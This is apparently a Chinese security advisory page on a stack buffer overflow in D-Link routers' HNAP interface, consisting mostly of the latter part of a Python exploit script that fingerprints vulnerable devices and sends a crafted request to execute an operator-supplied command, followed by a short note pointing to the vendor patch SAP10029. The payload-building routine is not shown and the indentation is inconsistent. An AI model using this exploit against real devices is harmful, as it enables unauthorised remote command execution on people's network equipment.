505L栈缓冲区溢出漏洞(2)

def _request(self, data=None):
    """Send one HTTP request to ``self.url`` and return the response body.

    ``data`` is handed to ``urllib2.Request`` unchanged; with urllib2 a
    non-None ``data`` makes the request a POST, otherwise it is a GET.

    Returns the body read from the response. If the server answers with an
    HTTP error status, an empty string is returned instead.
    """
    request = urllib2.Request(self.url, data)
    try:
        return urllib2.urlopen(request).read()
    except urllib2.HTTPError as err:
        # Only HTTPError is handled; any other failure (e.g. a connection
        # error) propagates to the caller.
        if err.code != 500:
            self._debug_error("Unexpected response: %s" % (str(err)))
        else:
            # A 500 is read as the CGI handler dying before it produced any
            # output; on the device side that crash is the observable event.
            self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!")
        return ""

def fingerprint(self):
    """Identify the remote device from its response to a data-less request.

    The response body is tested against every entry of
    ``self.VULNERABLE_DEVICES`` in order, using each entry's ``match``
    method.

    Returns the first entry that matches, or ``None`` when none does.
    """
    # presumably the device's HNAP description (the original calls this
    # value ``hnap_info``) -- confirm against the class's URL setup.
    banner = self._request()

    for candidate in self.VULNERABLE_DEVICES:
        if not candidate.match(banner):
            continue
        self._debug_message("Identified target as %s v%s" % (candidate.model, candidate.version))
        return candidate

    self._debug_error("Could not identify target!")
    return None

def execute(self, device, command=DEFAULT_COMMAND):
    """Build the request body for ``device`` and ``command`` and send it.

    The body comes from ``self._build_exploit`` (defined elsewhere in the
    class) and is sent through ``self._request``.

    Returns whatever ``self._request`` returns: the response body, or an
    empty string when the server replied with an HTTP error.
    """
    self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version))
    payload = self._build_exploit(device, command)
    return self._request(payload)
       
    def exploit(self, command=DEFAULT_COMMAND):
        """Fingerprint the target and, if it is recognised, run ``execute``.

        Returns the result of ``execute`` for a recognised device, or an
        empty string when ``fingerprint`` finds no match.
        """
        matched_device = self.fingerprint()
        if not matched_device:
            # Unrecognised device: nothing is sent beyond the fingerprint request.
            return ""
        return self.execute(matched_device, command)

if __name__ == "__main__":
    # Exactly two positional arguments are expected: the target IP and the
    # command string; anything else prints the usage line and exits with 1.
    if len(sys.argv) != 3:
        print("Usage: %s <target ip> <command to execute>" % sys.argv[0])
        sys.exit(1)

    target, command = sys.argv[1:3]

    # Output is whatever exploit() returned, preceded by a newline.
    print("\n" + Vulnerability(target).exploit(command))

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
D-Link 安全公告编号:SAP10029(原文链接在转载时被截断,仅保留了查询参数 ?name=SAP10029)
